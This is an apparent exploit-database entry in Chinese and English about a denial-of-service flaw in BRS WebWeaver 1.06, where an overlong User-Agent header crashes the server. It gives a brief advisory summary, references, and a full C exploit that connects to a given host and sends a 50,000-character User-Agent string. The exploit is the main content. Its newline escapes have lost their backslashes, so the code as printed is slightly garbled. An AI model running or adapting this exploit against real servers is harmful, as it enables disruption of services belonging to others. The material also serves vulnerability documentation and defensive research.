https://www.exploit-db.com/exploits/23325
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-151

BRSWebWeaver是一款集成化的小型快速的HTTP和FTP服务程序，提供目录保护功能，适用于Windows9x/NT操作系统。BRSWebWeaverhttpd不正确处理用户提交的`User-Agent`字段数据，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。如果用户提交的HTTP请求中的`User-Agent`字段包含超长字符串，当BRSWebWeaverhttpd解析时，可导致程序崩溃，停止所有响应，产生拒绝服务。

source: http://www.securityfocus.com/bid/8947/info

It has been reported that BRS WebWeaver may be prone to a denial of service issue that may allow a remote attacker to cause the software to crash or hang. The issue presents itself when the server receives a request containing a large string value for the `User-Agent` parameter. 

Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.

BRS WebWeaver versions 1.06 and prior have been reported to be prone to this issue.

/*
 *  BRS WebWeaver v.1.06 remote DoS exploit
 *
 * -d4rkgr3y [[email protected]]
 *
 */

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <sys/socket.h>

#define port 80

main(int argc, char **argv) {
        struct hostent *hs;
        struct sockaddr_in sock;
        int sockfd, i;
        const c = 50000;
        char request[50150] =
                "GET /m00-r0cz HTTP/1.0n"
                "Accept: */*n"
                "Accept-Language: jpn"
                "Accept-Encoding: gzip, deflaten"
                "Host: m00security.orgn"
                "User-Agent: ";
        printf("BRS WebWeaver v.1.06 remote DoS exploitnn");

        if (argc!=2){
                printf("usagen %s hostnamenn",argv[0]);
                exit(1);
        }

        //memset((request+98),0x41,c);
        memset((request+strlen(request)),0x41,c);
        /* l33t ;] */
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x43;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x63;
        request[strlen(request)] = 0x74;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x6f;
        request[strlen(request)] = 0x6e;
        request[strlen(request)] = 0x3a;
        request[strlen(request)] = 0x20;
        request[strlen(request)] = 0x4b;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x65;
request[strlen(request)] = 0x70;
        request[strlen(request)] = 0x2d;
        request[strlen(request)] = 0x41;
        request[strlen(request)] = 0x6c;
        request[strlen(request)] = 0x69;
        request[strlen(request)] = 0x76;
        request[strlen(request)] = 0x65;
        request[strlen(request)] = 0x0a;
        request[strlen(request)] = 0x0a;

        bzero(&sock, sizeof(sock));
        sock.sin_family = AF_INET;
        sock.sin_port = htons(port);
        if ((sock.sin_addr.s_addr=inet_addr(argv[1]))==-1) {
                if ((hs=gethostbyname(argv[1]))==NULL) {
                        printf("damn");
                        exit(1);
                }
                printf("~ Host resolved.n");
                sock.sin_family = hs->h_addrtype;
                
memcpy((caddr_t)&sock.sin_addr.s_addr,hs->h_addr,hs->h_length);
        }
        if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
                perror("damn");  exit(0);
        }

        if(connect(sockfd, (struct sockaddr *)&sock, sizeof(sock)) < 0){
                perror("damn"); exit(0);
        }
        printf("~ Socket connectedn");
        printf("~ Sending evil code... ");
        write(sockfd,request,strlen(request));
        printf("donenn");
        close(sockfd);
}

来源:XF
名称:brswebweaver-useragent-bo(13571)
链接:http://xforce.iss.net/xforce/xfdb/13571
来源:BID
名称:8947
链接:http://www.securityfocus.com/bid/8947
来源:BUGTRAQ
名称:20031101BRSWebWeaver1.06remoteDoSvulnerability
链接:http://www.securityfocus.com/archive/1/343111
来源：NSFOCUS
名称：5624
链接：http://www.nsfocus.net/vulndb/5624